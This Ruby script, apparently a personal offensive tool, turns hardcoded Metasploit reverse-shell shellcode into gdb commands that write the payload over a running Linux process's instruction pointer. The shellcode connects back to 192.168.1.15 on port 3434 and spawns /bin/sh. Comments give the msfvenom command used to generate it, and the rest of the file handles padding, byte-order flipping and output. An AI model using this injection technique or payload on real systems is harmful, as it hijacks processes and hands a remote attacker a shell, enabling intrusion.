gdb proc inj --

#!/usr/bin/env ruby
# gdb_process_injection.rb
# dualfade --

# inspired by --
# https://bit.ly/3VSvWHX --

# testing  --
# docker run -it --rm --cap-add CAP_SYS_PTRACE ubuntu bash

# imports --
require 'bundler/inline'

gemfile do
  source 'https://rubygems.org'
  gem 'slop', require: true
  gem 'logger', require: true
end

# logging --
logger = Logger.new($stdout)
original_formatter = Logger::Formatter.new
logger.formatter = proc { |severity, datetime, progname, msg|
  original_formatter.call(severity, datetime, progname, msg.dump)
}

# reverse hex endianness --
# https://www.rubydoc.info/stdlib/core/String:scan --
def flip_bytes(hex)
  hex.scan(/../).reverse.join('')
end

# load file --
def format_msf_payload
  # NOTE: ruby3.x does not like + as concatenation --
  # NOTE: rubocop will spit out out warnings --
  # ex: msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=3434 -f rb -o /tmp/payload.rb
  # msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=3434 | ndisasm -u -
  logger = Logger.new($stdout)

  buf =
    "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97" \
    "\x48\xb9\x02\x00\x0d\x6a\xc0\xa8\x01\x0f\x51\x48\x89\xe6" \
    "\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" \
    "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f" \
    "\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48" \
    "\x89\xe6\x0f\x05"

  # find modulo; adjust payload size; + nops --
  modulo = buf.length % 8
  padding = 8 - (buf.length % 8)
  payload = ("\x90" * padding) + buf

  # format output --
  logger.info(format('payload size => %s bytes', buf.bytesize))
  logger.info(format('modulo => %s', modulo))
  logger.info(format('nop padding => %s bytes', padding))
  logger.info(format('new buf size => %s', payload.bytesize))
  logger.info(format('generating gdb payload =>'))

  # NOTE: unpack arr to str, scan; split array; set i inc --
  # NOTE: nothing like learning a new language --
  p = payload.unpack('H*').to_s
  c = p.scan(/\w{16}/)

  counter = 0
  gdb_shell = []
  loop do
    # HACK: adjust rip offset --
    i = -8
    counter += p.length
    c.each do |e|
      i += 8
      f = format('set {long}($rip+%d) = 0x%s', i, flip_bytes(e))
      gdb_shell.push(f)
    end
    break if counter == p.length
  end

  # ret --
  gdb_shell
end

# write --
def write_file(gdb_shell, outfile)
  logger = Logger.new($stdout)
  logger.info(format('writing array to file => %s', outfile))

  gdb_shell.each do |line|
    file_obj = File.new(outfile, 'a')
    file_obj.syswrite("#{line}\n")
    file_obj.close
  end
end

# errs --
def error(message)
  logger = Logger.new($stdout)
  logger.info(format('%s', message))
end

# main ;slop opts --
if __FILE__ == $PROGRAM_NAME

  logger.info('[+] gdb_process_injection --')
  puts

  begin
    opts = Slop.parse do |o|
      # get opts --
      o.string('-o', '--output', 'write gdb payload to file')
      o.on('-h', '--help', 'help: this menu') do
        puts(o)
        exit
      end
    end

    # opts err check --
    exit logger.error('exit => missing output') if opts[:output].nil?

    # assign opts --
    outfile = (opts[:output])
    gdb_shell = format_msf_payload
    write_file(gdb_shell, outfile)
    puts("\n", gdb_shell)

  # errs --
  rescue Slop::Error => e
    logger.error(e)
  rescue StandardError => e
    logger.error(e)
  end

else
  puts('[+] finished')
end